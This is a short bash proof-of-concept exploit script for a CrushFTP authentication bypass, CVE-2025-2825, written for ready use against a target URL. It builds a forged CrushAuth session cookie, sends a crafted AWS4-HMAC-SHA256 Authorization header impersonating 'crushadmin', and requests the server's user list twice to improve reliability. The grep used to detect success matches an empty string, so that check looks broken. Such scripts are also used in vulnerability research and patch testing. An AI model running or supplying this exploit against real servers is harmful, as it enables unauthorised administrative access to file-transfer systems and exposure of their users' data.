#!/bin/bash # CrushFTP CVE-2025-2825 Auth Bypass Exploit (Improved Version) # Author: jeongwoongyoon # This PoC performs a double-request strategy (like nuclei) to increase reliability. # Usage: ./exploit_crushftp.sh http://: [CrushAuth] [c2f] TARGET=$1 CUSTOM_CRUSHAUTH=$2 CUSTOM_C2F=$3 if [ -z "$TARGET" ]; then echo "Usage: $0 http://: [CrushAuth] [c2f]" exit 1 fi # Generate or use provided CrushAuth/C2F if [ -z "$CUSTOM_CRUSHAUTH" ]; then PREFIX=$(shuf -i 1000000000000-9999999999999 -n 1) MID=$(head /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 26) SUFFIX=$(shuf -i 1000-9999 -n 1) CRUSHAUTH="${PREFIX}_${MID}${SUFFIX}" C2F=$SUFFIX else CRUSHAUTH=$CUSTOM_CRUSHAUTH C2F=$CUSTOM_C2F fi URL="$TARGET/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=$C2F" echo "[+] Target: $TARGET" echo "[+] CrushAuth: $CRUSHAUTH" echo "[+] Length: ${#CRUSHAUTH}" echo "[+] c2f: $C2F" echo "[*] Sending double exploit request..." # Send first warmup request (some servers need this) curl -s --compressed "$URL" \ -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \ -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \ -H "Origin: $TARGET" \ -H "Referer: $TARGET/WebInterface/login.html" \ -H "X-Requested-With: XMLHttpRequest" \ -H "Accept-Encoding: identity" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \ -H "Connection: close" > /dev/null sleep 0.3 # Second actual trigger request RESPONSE=$(curl -s --compressed "$URL" \ -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \ -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \ -H "Origin: $TARGET" \ -H "Referer: $TARGET/WebInterface/login.html" \ -H "X-Requested-With: XMLHttpRequest" \ -H "Accept-Encoding: identity" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \ -H "Connection: close") if echo "$RESPONSE" | grep -q ""; then echo "[+] Exploit successful!" echo "$RESPONSE" | grep "" else echo "[-] Exploit failed or blocked." echo "[*] Partial Response:" echo "$RESPONSE" | head -n 20 fi